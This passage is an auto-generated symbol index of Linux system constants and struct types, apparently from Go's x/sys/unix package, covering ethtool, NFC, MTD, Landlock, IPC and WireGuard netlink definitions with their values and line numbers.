ETHTOOL_A_COALESCE_UNSPEC (line 3914) | ETHTOOL_A_COALESCE_UNSPEC = 0x0 constant ETHTOOL_A_COALESCE_HEADER (line 3915) | ETHTOOL_A_COALESCE_HEADER = 0x1 constant ETHTOOL_A_COALESCE_RX_USECS (line 3916) | ETHTOOL_A_COALESCE_RX_USECS = 0x2 constant ETHTOOL_A_COALESCE_RX_MAX_FRAMES (line 3917) | ETHTOOL_A_COALESCE_RX_MAX_FRAMES = 0x3 constant ETHTOOL_A_COALESCE_RX_USECS_IRQ (line 3918) | ETHTOOL_A_COALESCE_RX_USECS_IRQ = 0x4 constant ETHTOOL_A_COALESCE_RX_MAX_FRAMES_IRQ (line 3919) | ETHTOOL_A_COALESCE_RX_MAX_FRAMES_IRQ = 0x5 constant ETHTOOL_A_COALESCE_TX_USECS (line 3920) | ETHTOOL_A_COALESCE_TX_USECS = 0x6 constant ETHTOOL_A_COALESCE_TX_MAX_FRAMES (line 3921) | ETHTOOL_A_COALESCE_TX_MAX_FRAMES = 0x7 constant ETHTOOL_A_COALESCE_TX_USECS_IRQ (line 3922) | ETHTOOL_A_COALESCE_TX_USECS_IRQ = 0x8 constant ETHTOOL_A_COALESCE_TX_MAX_FRAMES_IRQ (line 3923) | ETHTOOL_A_COALESCE_TX_MAX_FRAMES_IRQ = 0x9 constant ETHTOOL_A_COALESCE_STATS_BLOCK_USECS (line 3924) | ETHTOOL_A_COALESCE_STATS_BLOCK_USECS = 0xa constant ETHTOOL_A_COALESCE_USE_ADAPTIVE_RX (line 3925) | ETHTOOL_A_COALESCE_USE_ADAPTIVE_RX = 0xb constant ETHTOOL_A_COALESCE_USE_ADAPTIVE_TX (line 3926) | ETHTOOL_A_COALESCE_USE_ADAPTIVE_TX = 0xc constant ETHTOOL_A_COALESCE_PKT_RATE_LOW (line 3927) | ETHTOOL_A_COALESCE_PKT_RATE_LOW = 0xd constant ETHTOOL_A_COALESCE_RX_USECS_LOW (line 3928) | ETHTOOL_A_COALESCE_RX_USECS_LOW = 0xe constant ETHTOOL_A_COALESCE_RX_MAX_FRAMES_LOW (line 3929) | ETHTOOL_A_COALESCE_RX_MAX_FRAMES_LOW = 0xf constant ETHTOOL_A_COALESCE_TX_USECS_LOW (line 3930) | ETHTOOL_A_COALESCE_TX_USECS_LOW = 0x10 constant ETHTOOL_A_COALESCE_TX_MAX_FRAMES_LOW (line 3931) | ETHTOOL_A_COALESCE_TX_MAX_FRAMES_LOW = 0x11 constant ETHTOOL_A_COALESCE_PKT_RATE_HIGH (line 3932) | ETHTOOL_A_COALESCE_PKT_RATE_HIGH = 0x12 constant ETHTOOL_A_COALESCE_RX_USECS_HIGH (line 3933) | ETHTOOL_A_COALESCE_RX_USECS_HIGH = 0x13 constant ETHTOOL_A_COALESCE_RX_MAX_FRAMES_HIGH (line 3934) | ETHTOOL_A_COALESCE_RX_MAX_FRAMES_HIGH = 0x14 constant ETHTOOL_A_COALESCE_TX_USECS_HIGH (line 3935) | ETHTOOL_A_COALESCE_TX_USECS_HIGH = 0x15 constant ETHTOOL_A_COALESCE_TX_MAX_FRAMES_HIGH (line 3936) | ETHTOOL_A_COALESCE_TX_MAX_FRAMES_HIGH = 0x16 constant ETHTOOL_A_COALESCE_RATE_SAMPLE_INTERVAL (line 3937) | ETHTOOL_A_COALESCE_RATE_SAMPLE_INTERVAL = 0x17 constant ETHTOOL_A_COALESCE_USE_CQE_MODE_TX (line 3938) | ETHTOOL_A_COALESCE_USE_CQE_MODE_TX = 0x18 constant ETHTOOL_A_COALESCE_USE_CQE_MODE_RX (line 3939) | ETHTOOL_A_COALESCE_USE_CQE_MODE_RX = 0x19 constant ETHTOOL_A_COALESCE_MAX (line 3940) | ETHTOOL_A_COALESCE_MAX = 0x1c constant ETHTOOL_A_PAUSE_UNSPEC (line 3941) | ETHTOOL_A_PAUSE_UNSPEC = 0x0 constant ETHTOOL_A_PAUSE_HEADER (line 3942) | ETHTOOL_A_PAUSE_HEADER = 0x1 constant ETHTOOL_A_PAUSE_AUTONEG (line 3943) | ETHTOOL_A_PAUSE_AUTONEG = 0x2 constant ETHTOOL_A_PAUSE_RX (line 3944) | ETHTOOL_A_PAUSE_RX = 0x3 constant ETHTOOL_A_PAUSE_TX (line 3945) | ETHTOOL_A_PAUSE_TX = 0x4 constant ETHTOOL_A_PAUSE_STATS (line 3946) | ETHTOOL_A_PAUSE_STATS = 0x5 constant ETHTOOL_A_PAUSE_MAX (line 3947) | ETHTOOL_A_PAUSE_MAX = 0x6 constant ETHTOOL_A_PAUSE_STAT_UNSPEC (line 3948) | ETHTOOL_A_PAUSE_STAT_UNSPEC = 0x0 constant ETHTOOL_A_PAUSE_STAT_PAD (line 3949) | ETHTOOL_A_PAUSE_STAT_PAD = 0x1 constant ETHTOOL_A_PAUSE_STAT_TX_FRAMES (line 3950) | ETHTOOL_A_PAUSE_STAT_TX_FRAMES = 0x2 constant ETHTOOL_A_PAUSE_STAT_RX_FRAMES (line 3951) | ETHTOOL_A_PAUSE_STAT_RX_FRAMES = 0x3 constant ETHTOOL_A_PAUSE_STAT_MAX (line 3952) | ETHTOOL_A_PAUSE_STAT_MAX = 0x3 constant ETHTOOL_A_EEE_UNSPEC (line 3953) | ETHTOOL_A_EEE_UNSPEC = 0x0 constant ETHTOOL_A_EEE_HEADER (line 3954) | ETHTOOL_A_EEE_HEADER = 0x1 constant ETHTOOL_A_EEE_MODES_OURS (line 3955) | ETHTOOL_A_EEE_MODES_OURS = 0x2 constant ETHTOOL_A_EEE_MODES_PEER (line 3956) | ETHTOOL_A_EEE_MODES_PEER = 0x3 constant ETHTOOL_A_EEE_ACTIVE (line 3957) | ETHTOOL_A_EEE_ACTIVE = 0x4 constant ETHTOOL_A_EEE_ENABLED (line 3958) | ETHTOOL_A_EEE_ENABLED = 0x5 constant ETHTOOL_A_EEE_TX_LPI_ENABLED (line 3959) | ETHTOOL_A_EEE_TX_LPI_ENABLED = 0x6 constant ETHTOOL_A_EEE_TX_LPI_TIMER (line 3960) | ETHTOOL_A_EEE_TX_LPI_TIMER = 0x7 constant ETHTOOL_A_EEE_MAX (line 3961) | ETHTOOL_A_EEE_MAX = 0x7 constant ETHTOOL_A_TSINFO_UNSPEC (line 3962) | ETHTOOL_A_TSINFO_UNSPEC = 0x0 constant ETHTOOL_A_TSINFO_HEADER (line 3963) | ETHTOOL_A_TSINFO_HEADER = 0x1 constant ETHTOOL_A_TSINFO_TIMESTAMPING (line 3964) | ETHTOOL_A_TSINFO_TIMESTAMPING = 0x2 constant ETHTOOL_A_TSINFO_TX_TYPES (line 3965) | ETHTOOL_A_TSINFO_TX_TYPES = 0x3 constant ETHTOOL_A_TSINFO_RX_FILTERS (line 3966) | ETHTOOL_A_TSINFO_RX_FILTERS = 0x4 constant ETHTOOL_A_TSINFO_PHC_INDEX (line 3967) | ETHTOOL_A_TSINFO_PHC_INDEX = 0x5 constant ETHTOOL_A_TSINFO_MAX (line 3968) | ETHTOOL_A_TSINFO_MAX = 0x5 constant ETHTOOL_A_CABLE_TEST_UNSPEC (line 3969) | ETHTOOL_A_CABLE_TEST_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_HEADER (line 3970) | ETHTOOL_A_CABLE_TEST_HEADER = 0x1 constant ETHTOOL_A_CABLE_TEST_MAX (line 3971) | ETHTOOL_A_CABLE_TEST_MAX = 0x1 constant ETHTOOL_A_CABLE_RESULT_CODE_UNSPEC (line 3972) | ETHTOOL_A_CABLE_RESULT_CODE_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_RESULT_CODE_OK (line 3973) | ETHTOOL_A_CABLE_RESULT_CODE_OK = 0x1 constant ETHTOOL_A_CABLE_RESULT_CODE_OPEN (line 3974) | ETHTOOL_A_CABLE_RESULT_CODE_OPEN = 0x2 constant ETHTOOL_A_CABLE_RESULT_CODE_SAME_SHORT (line 3975) | ETHTOOL_A_CABLE_RESULT_CODE_SAME_SHORT = 0x3 constant ETHTOOL_A_CABLE_RESULT_CODE_CROSS_SHORT (line 3976) | ETHTOOL_A_CABLE_RESULT_CODE_CROSS_SHORT = 0x4 constant ETHTOOL_A_CABLE_PAIR_A (line 3977) | ETHTOOL_A_CABLE_PAIR_A = 0x0 constant ETHTOOL_A_CABLE_PAIR_B (line 3978) | ETHTOOL_A_CABLE_PAIR_B = 0x1 constant ETHTOOL_A_CABLE_PAIR_C (line 3979) | ETHTOOL_A_CABLE_PAIR_C = 0x2 constant ETHTOOL_A_CABLE_PAIR_D (line 3980) | ETHTOOL_A_CABLE_PAIR_D = 0x3 constant ETHTOOL_A_CABLE_RESULT_UNSPEC (line 3981) | ETHTOOL_A_CABLE_RESULT_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_RESULT_PAIR (line 3982) | ETHTOOL_A_CABLE_RESULT_PAIR = 0x1 constant ETHTOOL_A_CABLE_RESULT_CODE (line 3983) | ETHTOOL_A_CABLE_RESULT_CODE = 0x2 constant ETHTOOL_A_CABLE_RESULT_MAX (line 3984) | ETHTOOL_A_CABLE_RESULT_MAX = 0x2 constant ETHTOOL_A_CABLE_FAULT_LENGTH_UNSPEC (line 3985) | ETHTOOL_A_CABLE_FAULT_LENGTH_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_FAULT_LENGTH_PAIR (line 3986) | ETHTOOL_A_CABLE_FAULT_LENGTH_PAIR = 0x1 constant ETHTOOL_A_CABLE_FAULT_LENGTH_CM (line 3987) | ETHTOOL_A_CABLE_FAULT_LENGTH_CM = 0x2 constant ETHTOOL_A_CABLE_FAULT_LENGTH_MAX (line 3988) | ETHTOOL_A_CABLE_FAULT_LENGTH_MAX = 0x2 constant ETHTOOL_A_CABLE_TEST_NTF_STATUS_UNSPEC (line 3989) | ETHTOOL_A_CABLE_TEST_NTF_STATUS_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_NTF_STATUS_STARTED (line 3990) | ETHTOOL_A_CABLE_TEST_NTF_STATUS_STARTED = 0x1 constant ETHTOOL_A_CABLE_TEST_NTF_STATUS_COMPLETED (line 3991) | ETHTOOL_A_CABLE_TEST_NTF_STATUS_COMPLETED = 0x2 constant ETHTOOL_A_CABLE_NEST_UNSPEC (line 3992) | ETHTOOL_A_CABLE_NEST_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_NEST_RESULT (line 3993) | ETHTOOL_A_CABLE_NEST_RESULT = 0x1 constant ETHTOOL_A_CABLE_NEST_FAULT_LENGTH (line 3994) | ETHTOOL_A_CABLE_NEST_FAULT_LENGTH = 0x2 constant ETHTOOL_A_CABLE_NEST_MAX (line 3995) | ETHTOOL_A_CABLE_NEST_MAX = 0x2 constant ETHTOOL_A_CABLE_TEST_NTF_UNSPEC (line 3996) | ETHTOOL_A_CABLE_TEST_NTF_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_NTF_HEADER (line 3997) | ETHTOOL_A_CABLE_TEST_NTF_HEADER = 0x1 constant ETHTOOL_A_CABLE_TEST_NTF_STATUS (line 3998) | ETHTOOL_A_CABLE_TEST_NTF_STATUS = 0x2 constant ETHTOOL_A_CABLE_TEST_NTF_NEST (line 3999) | ETHTOOL_A_CABLE_TEST_NTF_NEST = 0x3 constant ETHTOOL_A_CABLE_TEST_NTF_MAX (line 4000) | ETHTOOL_A_CABLE_TEST_NTF_MAX = 0x3 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_UNSPEC (line 4001) | ETHTOOL_A_CABLE_TEST_TDR_CFG_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_FIRST (line 4002) | ETHTOOL_A_CABLE_TEST_TDR_CFG_FIRST = 0x1 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_LAST (line 4003) | ETHTOOL_A_CABLE_TEST_TDR_CFG_LAST = 0x2 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_STEP (line 4004) | ETHTOOL_A_CABLE_TEST_TDR_CFG_STEP = 0x3 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_PAIR (line 4005) | ETHTOOL_A_CABLE_TEST_TDR_CFG_PAIR = 0x4 constant ETHTOOL_A_CABLE_TEST_TDR_CFG_MAX (line 4006) | ETHTOOL_A_CABLE_TEST_TDR_CFG_MAX = 0x4 constant ETHTOOL_A_CABLE_TEST_TDR_UNSPEC (line 4007) | ETHTOOL_A_CABLE_TEST_TDR_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_TDR_HEADER (line 4008) | ETHTOOL_A_CABLE_TEST_TDR_HEADER = 0x1 constant ETHTOOL_A_CABLE_TEST_TDR_CFG (line 4009) | ETHTOOL_A_CABLE_TEST_TDR_CFG = 0x2 constant ETHTOOL_A_CABLE_TEST_TDR_MAX (line 4010) | ETHTOOL_A_CABLE_TEST_TDR_MAX = 0x2 constant ETHTOOL_A_CABLE_AMPLITUDE_UNSPEC (line 4011) | ETHTOOL_A_CABLE_AMPLITUDE_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_AMPLITUDE_PAIR (line 4012) | ETHTOOL_A_CABLE_AMPLITUDE_PAIR = 0x1 constant ETHTOOL_A_CABLE_AMPLITUDE_mV (line 4013) | ETHTOOL_A_CABLE_AMPLITUDE_mV = 0x2 constant ETHTOOL_A_CABLE_AMPLITUDE_MAX (line 4014) | ETHTOOL_A_CABLE_AMPLITUDE_MAX = 0x2 constant ETHTOOL_A_CABLE_PULSE_UNSPEC (line 4015) | ETHTOOL_A_CABLE_PULSE_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_PULSE_mV (line 4016) | ETHTOOL_A_CABLE_PULSE_mV = 0x1 constant ETHTOOL_A_CABLE_PULSE_MAX (line 4017) | ETHTOOL_A_CABLE_PULSE_MAX = 0x1 constant ETHTOOL_A_CABLE_STEP_UNSPEC (line 4018) | ETHTOOL_A_CABLE_STEP_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_STEP_FIRST_DISTANCE (line 4019) | ETHTOOL_A_CABLE_STEP_FIRST_DISTANCE = 0x1 constant ETHTOOL_A_CABLE_STEP_LAST_DISTANCE (line 4020) | ETHTOOL_A_CABLE_STEP_LAST_DISTANCE = 0x2 constant ETHTOOL_A_CABLE_STEP_STEP_DISTANCE (line 4021) | ETHTOOL_A_CABLE_STEP_STEP_DISTANCE = 0x3 constant ETHTOOL_A_CABLE_STEP_MAX (line 4022) | ETHTOOL_A_CABLE_STEP_MAX = 0x3 constant ETHTOOL_A_CABLE_TDR_NEST_UNSPEC (line 4023) | ETHTOOL_A_CABLE_TDR_NEST_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TDR_NEST_STEP (line 4024) | ETHTOOL_A_CABLE_TDR_NEST_STEP = 0x1 constant ETHTOOL_A_CABLE_TDR_NEST_AMPLITUDE (line 4025) | ETHTOOL_A_CABLE_TDR_NEST_AMPLITUDE = 0x2 constant ETHTOOL_A_CABLE_TDR_NEST_PULSE (line 4026) | ETHTOOL_A_CABLE_TDR_NEST_PULSE = 0x3 constant ETHTOOL_A_CABLE_TDR_NEST_MAX (line 4027) | ETHTOOL_A_CABLE_TDR_NEST_MAX = 0x3 constant ETHTOOL_A_CABLE_TEST_TDR_NTF_UNSPEC (line 4028) | ETHTOOL_A_CABLE_TEST_TDR_NTF_UNSPEC = 0x0 constant ETHTOOL_A_CABLE_TEST_TDR_NTF_HEADER (line 4029) | ETHTOOL_A_CABLE_TEST_TDR_NTF_HEADER = 0x1 constant ETHTOOL_A_CABLE_TEST_TDR_NTF_STATUS (line 4030) | ETHTOOL_A_CABLE_TEST_TDR_NTF_STATUS = 0x2 constant ETHTOOL_A_CABLE_TEST_TDR_NTF_NEST (line 4031) | ETHTOOL_A_CABLE_TEST_TDR_NTF_NEST = 0x3 constant ETHTOOL_A_CABLE_TEST_TDR_NTF_MAX (line 4032) | ETHTOOL_A_CABLE_TEST_TDR_NTF_MAX = 0x3 constant ETHTOOL_UDP_TUNNEL_TYPE_VXLAN (line 4033) | ETHTOOL_UDP_TUNNEL_TYPE_VXLAN = 0x0 constant ETHTOOL_UDP_TUNNEL_TYPE_GENEVE (line 4034) | ETHTOOL_UDP_TUNNEL_TYPE_GENEVE = 0x1 constant ETHTOOL_UDP_TUNNEL_TYPE_VXLAN_GPE (line 4035) | ETHTOOL_UDP_TUNNEL_TYPE_VXLAN_GPE = 0x2 constant ETHTOOL_A_TUNNEL_UDP_ENTRY_UNSPEC (line 4036) | ETHTOOL_A_TUNNEL_UDP_ENTRY_UNSPEC = 0x0 constant ETHTOOL_A_TUNNEL_UDP_ENTRY_PORT (line 4037) | ETHTOOL_A_TUNNEL_UDP_ENTRY_PORT = 0x1 constant ETHTOOL_A_TUNNEL_UDP_ENTRY_TYPE (line 4038) | ETHTOOL_A_TUNNEL_UDP_ENTRY_TYPE = 0x2 constant ETHTOOL_A_TUNNEL_UDP_ENTRY_MAX (line 4039) | ETHTOOL_A_TUNNEL_UDP_ENTRY_MAX = 0x2 constant ETHTOOL_A_TUNNEL_UDP_TABLE_UNSPEC (line 4040) | ETHTOOL_A_TUNNEL_UDP_TABLE_UNSPEC = 0x0 constant ETHTOOL_A_TUNNEL_UDP_TABLE_SIZE (line 4041) | ETHTOOL_A_TUNNEL_UDP_TABLE_SIZE = 0x1 constant ETHTOOL_A_TUNNEL_UDP_TABLE_TYPES (line 4042) | ETHTOOL_A_TUNNEL_UDP_TABLE_TYPES = 0x2 constant ETHTOOL_A_TUNNEL_UDP_TABLE_ENTRY (line 4043) | ETHTOOL_A_TUNNEL_UDP_TABLE_ENTRY = 0x3 constant ETHTOOL_A_TUNNEL_UDP_TABLE_MAX (line 4044) | ETHTOOL_A_TUNNEL_UDP_TABLE_MAX = 0x3 constant ETHTOOL_A_TUNNEL_UDP_UNSPEC (line 4045) | ETHTOOL_A_TUNNEL_UDP_UNSPEC = 0x0 constant ETHTOOL_A_TUNNEL_UDP_TABLE (line 4046) | ETHTOOL_A_TUNNEL_UDP_TABLE = 0x1 constant ETHTOOL_A_TUNNEL_UDP_MAX (line 4047) | ETHTOOL_A_TUNNEL_UDP_MAX = 0x1 constant ETHTOOL_A_TUNNEL_INFO_UNSPEC (line 4048) | ETHTOOL_A_TUNNEL_INFO_UNSPEC = 0x0 constant ETHTOOL_A_TUNNEL_INFO_HEADER (line 4049) | ETHTOOL_A_TUNNEL_INFO_HEADER = 0x1 constant ETHTOOL_A_TUNNEL_INFO_UDP_PORTS (line 4050) | ETHTOOL_A_TUNNEL_INFO_UDP_PORTS = 0x2 constant ETHTOOL_A_TUNNEL_INFO_MAX (line 4051) | ETHTOOL_A_TUNNEL_INFO_MAX = 0x2 constant SPEED_UNKNOWN (line 4054) | SPEED_UNKNOWN = -0x1 type EthtoolDrvinfo (line 4056) | type EthtoolDrvinfo struct type HIDRawReportDescriptor (line 4072) | type HIDRawReportDescriptor struct type HIDRawDevInfo (line 4076) | type HIDRawDevInfo struct constant CLOSE_RANGE_UNSHARE (line 4084) | CLOSE_RANGE_UNSHARE = 0x2 constant CLOSE_RANGE_CLOEXEC (line 4085) | CLOSE_RANGE_CLOEXEC = 0x4 constant NLMSGERR_ATTR_MSG (line 4089) | NLMSGERR_ATTR_MSG = 0x1 constant NLMSGERR_ATTR_OFFS (line 4090) | NLMSGERR_ATTR_OFFS = 0x2 constant NLMSGERR_ATTR_COOKIE (line 4091) | NLMSGERR_ATTR_COOKIE = 0x3 type EraseInfo (line 4095) | type EraseInfo struct type EraseInfo64 (line 4099) | type EraseInfo64 struct type MtdOobBuf (line 4103) | type MtdOobBuf struct type MtdOobBuf64 (line 4108) | type MtdOobBuf64 struct type MtdWriteReq (line 4114) | type MtdWriteReq struct type MtdInfo (line 4123) | type MtdInfo struct type RegionInfo (line 4132) | type RegionInfo struct type OtpInfo (line 4138) | type OtpInfo struct type NandOobinfo (line 4143) | type NandOobinfo struct type NandOobfree (line 4149) | type NandOobfree struct type NandEcclayout (line 4153) | type NandEcclayout struct type MtdEccStats (line 4159) | type MtdEccStats struct constant MTD_OPS_PLACE_OOB (line 4168) | MTD_OPS_PLACE_OOB = 0x0 constant MTD_OPS_AUTO_OOB (line 4169) | MTD_OPS_AUTO_OOB = 0x1 constant MTD_OPS_RAW (line 4170) | MTD_OPS_RAW = 0x2 constant MTD_FILE_MODE_NORMAL (line 4174) | MTD_FILE_MODE_NORMAL = 0x0 constant MTD_FILE_MODE_OTP_FACTORY (line 4175) | MTD_FILE_MODE_OTP_FACTORY = 0x1 constant MTD_FILE_MODE_OTP_USER (line 4176) | MTD_FILE_MODE_OTP_USER = 0x2 constant MTD_FILE_MODE_RAW (line 4177) | MTD_FILE_MODE_RAW = 0x3 constant NFC_CMD_UNSPEC (line 4181) | NFC_CMD_UNSPEC = 0x0 constant NFC_CMD_GET_DEVICE (line 4182) | NFC_CMD_GET_DEVICE = 0x1 constant NFC_CMD_DEV_UP (line 4183) | NFC_CMD_DEV_UP = 0x2 constant NFC_CMD_DEV_DOWN (line 4184) | NFC_CMD_DEV_DOWN = 0x3 constant NFC_CMD_DEP_LINK_UP (line 4185) | NFC_CMD_DEP_LINK_UP = 0x4 constant NFC_CMD_DEP_LINK_DOWN (line 4186) | NFC_CMD_DEP_LINK_DOWN = 0x5 constant NFC_CMD_START_POLL (line 4187) | NFC_CMD_START_POLL = 0x6 constant NFC_CMD_STOP_POLL (line 4188) | NFC_CMD_STOP_POLL = 0x7 constant NFC_CMD_GET_TARGET (line 4189) | NFC_CMD_GET_TARGET = 0x8 constant NFC_EVENT_TARGETS_FOUND (line 4190) | NFC_EVENT_TARGETS_FOUND = 0x9 constant NFC_EVENT_DEVICE_ADDED (line 4191) | NFC_EVENT_DEVICE_ADDED = 0xa constant NFC_EVENT_DEVICE_REMOVED (line 4192) | NFC_EVENT_DEVICE_REMOVED = 0xb constant NFC_EVENT_TARGET_LOST (line 4193) | NFC_EVENT_TARGET_LOST = 0xc constant NFC_EVENT_TM_ACTIVATED (line 4194) | NFC_EVENT_TM_ACTIVATED = 0xd constant NFC_EVENT_TM_DEACTIVATED (line 4195) | NFC_EVENT_TM_DEACTIVATED = 0xe constant NFC_CMD_LLC_GET_PARAMS (line 4196) | NFC_CMD_LLC_GET_PARAMS = 0xf constant NFC_CMD_LLC_SET_PARAMS (line 4197) | NFC_CMD_LLC_SET_PARAMS = 0x10 constant NFC_CMD_ENABLE_SE (line 4198) | NFC_CMD_ENABLE_SE = 0x11 constant NFC_CMD_DISABLE_SE (line 4199) | NFC_CMD_DISABLE_SE = 0x12 constant NFC_CMD_LLC_SDREQ (line 4200) | NFC_CMD_LLC_SDREQ = 0x13 constant NFC_EVENT_LLC_SDRES (line 4201) | NFC_EVENT_LLC_SDRES = 0x14 constant NFC_CMD_FW_DOWNLOAD (line 4202) | NFC_CMD_FW_DOWNLOAD = 0x15 constant NFC_EVENT_SE_ADDED (line 4203) | NFC_EVENT_SE_ADDED = 0x16 constant NFC_EVENT_SE_REMOVED (line 4204) | NFC_EVENT_SE_REMOVED = 0x17 constant NFC_EVENT_SE_CONNECTIVITY (line 4205) | NFC_EVENT_SE_CONNECTIVITY = 0x18 constant NFC_EVENT_SE_TRANSACTION (line 4206) | NFC_EVENT_SE_TRANSACTION = 0x19 constant NFC_CMD_GET_SE (line 4207) | NFC_CMD_GET_SE = 0x1a constant NFC_CMD_SE_IO (line 4208) | NFC_CMD_SE_IO = 0x1b constant NFC_CMD_ACTIVATE_TARGET (line 4209) | NFC_CMD_ACTIVATE_TARGET = 0x1c constant NFC_CMD_VENDOR (line 4210) | NFC_CMD_VENDOR = 0x1d constant NFC_CMD_DEACTIVATE_TARGET (line 4211) | NFC_CMD_DEACTIVATE_TARGET = 0x1e constant NFC_ATTR_UNSPEC (line 4212) | NFC_ATTR_UNSPEC = 0x0 constant NFC_ATTR_DEVICE_INDEX (line 4213) | NFC_ATTR_DEVICE_INDEX = 0x1 constant NFC_ATTR_DEVICE_NAME (line 4214) | NFC_ATTR_DEVICE_NAME = 0x2 constant NFC_ATTR_PROTOCOLS (line 4215) | NFC_ATTR_PROTOCOLS = 0x3 constant NFC_ATTR_TARGET_INDEX (line 4216) | NFC_ATTR_TARGET_INDEX = 0x4 constant NFC_ATTR_TARGET_SENS_RES (line 4217) | NFC_ATTR_TARGET_SENS_RES = 0x5 constant NFC_ATTR_TARGET_SEL_RES (line 4218) | NFC_ATTR_TARGET_SEL_RES = 0x6 constant NFC_ATTR_TARGET_NFCID1 (line 4219) | NFC_ATTR_TARGET_NFCID1 = 0x7 constant NFC_ATTR_TARGET_SENSB_RES (line 4220) | NFC_ATTR_TARGET_SENSB_RES = 0x8 constant NFC_ATTR_TARGET_SENSF_RES (line 4221) | NFC_ATTR_TARGET_SENSF_RES = 0x9 constant NFC_ATTR_COMM_MODE (line 4222) | NFC_ATTR_COMM_MODE = 0xa constant NFC_ATTR_RF_MODE (line 4223) | NFC_ATTR_RF_MODE = 0xb constant NFC_ATTR_DEVICE_POWERED (line 4224) | NFC_ATTR_DEVICE_POWERED = 0xc constant NFC_ATTR_IM_PROTOCOLS (line 4225) | NFC_ATTR_IM_PROTOCOLS = 0xd constant NFC_ATTR_TM_PROTOCOLS (line 4226) | NFC_ATTR_TM_PROTOCOLS = 0xe constant NFC_ATTR_LLC_PARAM_LTO (line 4227) | NFC_ATTR_LLC_PARAM_LTO = 0xf constant NFC_ATTR_LLC_PARAM_RW (line 4228) | NFC_ATTR_LLC_PARAM_RW = 0x10 constant NFC_ATTR_LLC_PARAM_MIUX (line 4229) | NFC_ATTR_LLC_PARAM_MIUX = 0x11 constant NFC_ATTR_SE (line 4230) | NFC_ATTR_SE = 0x12 constant NFC_ATTR_LLC_SDP (line 4231) | NFC_ATTR_LLC_SDP = 0x13 constant NFC_ATTR_FIRMWARE_NAME (line 4232) | NFC_ATTR_FIRMWARE_NAME = 0x14 constant NFC_ATTR_SE_INDEX (line 4233) | NFC_ATTR_SE_INDEX = 0x15 constant NFC_ATTR_SE_TYPE (line 4234) | NFC_ATTR_SE_TYPE = 0x16 constant NFC_ATTR_SE_AID (line 4235) | NFC_ATTR_SE_AID = 0x17 constant NFC_ATTR_FIRMWARE_DOWNLOAD_STATUS (line 4236) | NFC_ATTR_FIRMWARE_DOWNLOAD_STATUS = 0x18 constant NFC_ATTR_SE_APDU (line 4237) | NFC_ATTR_SE_APDU = 0x19 constant NFC_ATTR_TARGET_ISO15693_DSFID (line 4238) | NFC_ATTR_TARGET_ISO15693_DSFID = 0x1a constant NFC_ATTR_TARGET_ISO15693_UID (line 4239) | NFC_ATTR_TARGET_ISO15693_UID = 0x1b constant NFC_ATTR_SE_PARAMS (line 4240) | NFC_ATTR_SE_PARAMS = 0x1c constant NFC_ATTR_VENDOR_ID (line 4241) | NFC_ATTR_VENDOR_ID = 0x1d constant NFC_ATTR_VENDOR_SUBCMD (line 4242) | NFC_ATTR_VENDOR_SUBCMD = 0x1e constant NFC_ATTR_VENDOR_DATA (line 4243) | NFC_ATTR_VENDOR_DATA = 0x1f constant NFC_SDP_ATTR_UNSPEC (line 4244) | NFC_SDP_ATTR_UNSPEC = 0x0 constant NFC_SDP_ATTR_URI (line 4245) | NFC_SDP_ATTR_URI = 0x1 constant NFC_SDP_ATTR_SAP (line 4246) | NFC_SDP_ATTR_SAP = 0x2 type LandlockRulesetAttr (line 4249) | type LandlockRulesetAttr struct type LandlockPathBeneathAttr (line 4254) | type LandlockPathBeneathAttr struct constant LANDLOCK_RULE_PATH_BENEATH (line 4260) | LANDLOCK_RULE_PATH_BENEATH = 0x1 constant IPC_CREAT (line 4264) | IPC_CREAT = 0x200 constant IPC_EXCL (line 4265) | IPC_EXCL = 0x400 constant IPC_NOWAIT (line 4266) | IPC_NOWAIT = 0x800 constant IPC_PRIVATE (line 4267) | IPC_PRIVATE = 0x0 constant ipc_64 (line 4269) | ipc_64 = 0x100 constant IPC_RMID (line 4273) | IPC_RMID = 0x0 constant IPC_SET (line 4274) | IPC_SET = 0x1 constant IPC_STAT (line 4275) | IPC_STAT = 0x2 constant SHM_RDONLY (line 4279) | SHM_RDONLY = 0x1000 constant SHM_RND (line 4280) | SHM_RND = 0x2000 type MountAttr (line 4283) | type MountAttr struct constant WG_CMD_GET_DEVICE (line 4291) | WG_CMD_GET_DEVICE = 0x0 constant WG_CMD_SET_DEVICE (line 4292) | WG_CMD_SET_DEVICE = 0x1 constant WGDEVICE_F_REPLACE_PEERS (line 4293) | WGDEVICE_F_REPLACE_PEERS = 0x1 constant WGDEVICE_A_UNSPEC (line 4294) | WGDEVICE_A_UNSPEC = 0x0 constant WGDEVICE_A_IFINDEX (line 4295) | WGDEVICE_A_IFINDEX = 0x1 constant WGDEVICE_A_IFNAME (line 4296) | WGDEVICE_A_IFNAME = 0x2 constant WGDEVICE_A_PRIVATE_KEY (line 4297) | WGDEVICE_A_PRIVATE_KEY = 0x3 constant WGDEVICE_A_PUBLIC_KEY (line 4298) | WGDEVICE_A_PUBLIC_KEY = 0x4 constant WGDEVICE_A_FLAGS (line 4299) | WGDEVICE_A_FLAGS = 0x5 constant WGDEVICE_A_LISTEN_PORT (line 4300) | WGDEVICE_A_LISTEN_PORT = 0x6 constant WGDEVICE_A_FWMARK (line 4301) | WGDEVICE_A_FWMARK = 0x7 constant WGDEVICE_A_PEERS (line 4302) | WGDEVICE_A_PEERS = 0x8 constant WGPEER_F_REMOVE_ME (line 4303) | WGPEER_F_REMOVE_ME = 0x1 constant WGPEER_F_REPLACE_ALLOWEDIPS (line 4304) | WGPEER_F_REPLACE_ALLOWEDIPS = 0x2 constant WGPEER_F_UPDATE_ONLY (line 4305) | WGPEER_F_UPDATE_ONLY = 0x4 constant WGPEER_A_UNSPEC (line 4306) | WGPEER_A_UNSPEC = 0x0 constant 